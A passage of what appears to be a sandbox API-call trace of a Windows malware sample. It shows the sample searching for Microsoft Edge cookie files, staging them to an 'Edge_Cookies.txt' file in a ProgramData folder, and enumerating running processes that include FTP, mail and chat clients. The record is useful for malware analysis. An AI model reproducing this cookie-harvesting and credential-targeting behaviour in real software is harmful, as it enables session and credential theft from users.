lpFindFileData=0x18d37c*(dwFileAttributes=0x6c97830, ftCreationTime.dwLowDateTime=0x6c91768, ftCreationTime.dwHighDateTime=0x6c907d0, ftLastAccessTime.dwLowDateTime=0x6c91701, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x487460, nFileSizeLow=0x13, dwReserved0=0x7ce02c8, dwReserved1=0x6c90000, cFileName="ϐߎ", cAlternateFileName="혠\x18\x82")) returned 0xffffffff [0136.250] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x7ce0088 | out: hHeap=0x6c90000) returned 1 [0136.250] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x1c) returned 0x6c91658 [0136.250] FindNextFileW (in: hFindFile=0xffffffff, lpFindFileData=0x18d37c | out: lpFindFileData=0x18d37c*(dwFileAttributes=0x6c97830, ftCreationTime.dwLowDateTime=0x6c91768, ftCreationTime.dwHighDateTime=0x6c907d0, ftLastAccessTime.dwLowDateTime=0x6c91701, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x487460, nFileSizeLow=0x13, dwReserved0=0x7ce02c8, dwReserved1=0x6c90000, cFileName="ϐߎ", cAlternateFileName="혠\x18\x82")) returned 0 [0136.250] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x7ce02d0 | out: hHeap=0x6c90000) returned 1 [0136.250] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6c91380, cbMultiByte=25, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 25 [0136.250] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x32) returned 0x6c91410 [0136.250] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6c91380, cbMultiByte=25, lpWideCharStr=0x6c91410, cchWideChar=25 | out: lpWideCharStr="Cookies\\Edge_Cookies.txt") returned 25 [0136.250] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x40) returned 0x7ce02d0 [0136.251] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c91410 | out: hHeap=0x6c90000) returned 1 [0136.251] CreateFileW (lpFileName="Cookies\\Edge_Cookies.txt" (normalized: "c:\\programdata\\4zidrnx9mn20p9gn70eipohe8\\files\\cookies\\edge_cookies.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x18d4f8, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x344 [0136.251] GetFileType (hFile=0x344) returned 0x1 [0136.251] SetFilePointer (in: hFile=0x344, lDistanceToMove=-1, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0136.251] GetLastError () returned 0x83 [0136.251] GetLastError () returned 0x83 [0136.251] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\#!001\\MicrosoftEdge\\Cookies\\??" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\packages\\microsoft.microsoftedge_8wekyb3d8bbwe\\ac\\#!001\\microsoftedge\\cookies\\??"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x18d470, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0136.251] GetLastError () returned 0x3 [0136.251] GetLastError () returned 0x3 [0136.251] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\#!001\\MicrosoftEdge\\Cookies\\*.txt", lpFindFileData=0x18d37c | out: lpFindFileData=0x18d37c*(dwFileAttributes=0x25, ftCreationTime.dwLowDateTime=0x18, ftCreationTime.dwHighDateTime=0x53a8538, ftLastAccessTime.dwLowDateTime=0x18d3bc, ftLastAccessTime.dwHighDateTime=0x42, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x52f0178, nFileSizeHigh=0x0, nFileSizeLow=0x11, dwReserved0=0x7ce02c8, dwReserved1=0x6c90000, cFileName="ϐߎԹā\x18%", cAlternateFileName="혠\x18\x7f")) returned 0xffffffff [0136.252] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x7ce0088 | out: hHeap=0x6c90000) returned 1 [0136.252] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x1c) returned 0x6c91658 [0136.252] FindNextFileW (in: hFindFile=0xffffffff, lpFindFileData=0x18d37c | out: lpFindFileData=0x18d37c*(dwFileAttributes=0x25, ftCreationTime.dwLowDateTime=0x18, ftCreationTime.dwHighDateTime=0x53a8538, ftLastAccessTime.dwLowDateTime=0x18d3bc, ftLastAccessTime.dwHighDateTime=0x42, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x52f0178, nFileSizeHigh=0x0, nFileSizeLow=0x11, dwReserved0=0x7ce02c8, dwReserved1=0x6c90000, cFileName="ϐߎԹā\x18%", cAlternateFileName="혠\x18\x7f")) returned 0 [0136.252] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x7ce02d0 | out: hHeap=0x6c90000) returned 1 [0136.252] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6c91380, cbMultiByte=25, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 25 [0136.252] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x32) returned 0x6c91410 [0136.252] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6c91380, cbMultiByte=25, lpWideCharStr=0x6c91410, cchWideChar=25 | out: lpWideCharStr="Cookies\\Edge_Cookies.txt") returned 25 [0136.252] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x40) returned 0x7ce02d0 [0136.252] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c91410 | out: hHeap=0x6c90000) returned 1 [0136.252] CreateFileW (lpFileName="Cookies\\Edge_Cookies.txt" (normalized: "c:\\programdata\\4zidrnx9mn20p9gn70eipohe8\\files\\cookies\\edge_cookies.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x18d4f8, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x344 [0136.252] GetFileType (hFile=0x344) returned 0x1 [0136.252] SetFilePointer (in: hFile=0x344, lDistanceToMove=-1, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0136.252] GetLastError () returned 0x83 [0136.252] GetLastError () returned 0x83 [0136.253] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\#!001\\MicrosoftEdge\\Cookies\\????a\x18%" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\packages\\microsoft.microsoftedge_8wekyb3d8bbwe\\ac\\#!001\\microsoftedge\\cookies\\????a\x18%"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x18d470, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0136.253] GetLastError () returned 0x3 [0136.253] GetLastError () returned 0x3 [0136.253] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x344 [0136.260] Process32First (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0136.260] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0136.261] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0136.261] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0136.262] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0136.262] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0136.263] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0136.263] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0136.264] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0136.264] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0136.265] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0136.265] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0136.266] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0136.266] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0136.266] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0136.269] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0136.270] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0136.270] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x11c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0136.271] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x444, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0136.272] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0136.272] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0136.273] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0136.273] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0136.274] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x370, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0136.274] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x67c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="herb cos completed.exe")) returned 1 [0136.275] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x71c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="dealers.exe")) returned 1 [0136.275] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x434, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="hall-stronger.exe")) returned 1 [0136.276] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="rp-hip.exe")) returned 1 [0136.276] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x564, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="karma_coat.exe")) returned 1 [0136.277] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="plenty_leather.exe")) returned 1 [0136.277] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="entrytrackbackspatent.exe")) returned 1 [0136.277] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="busy.exe")) returned 1 [0136.278] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="sudan_territory.exe")) returned 1 [0136.278] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="catalogs intelligent.exe")) returned 1 [0136.279] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="prisonermounted.exe")) returned 1 [0136.279] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x798, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="extensive.exe")) returned 1 [0136.280] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="posters-baker-lift.exe")) returned 1 [0136.280] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x544, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="emperor_respected.exe")) returned 1 [0136.281] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="illinois indicated regional.exe")) returned 1 [0136.281] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="apartmentscontemporary.exe")) returned 1 [0136.282] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="witch-feat.exe")) returned 1 [0136.282] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0136.283] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0136.283] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0136.284] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0136.284] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x734, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0136.285] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x620, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0136.285] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0136.286] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x414, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0136.286] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0136.287] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0136.287] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x208, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0136.288] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x484, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0136.288] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0136.289] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x490, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0136.289] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x31c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0136.290] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x10c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0136.290] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x754, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0136.291] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x80c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0136.292] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x81c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0136.293] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x82c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0136.293] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x83c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 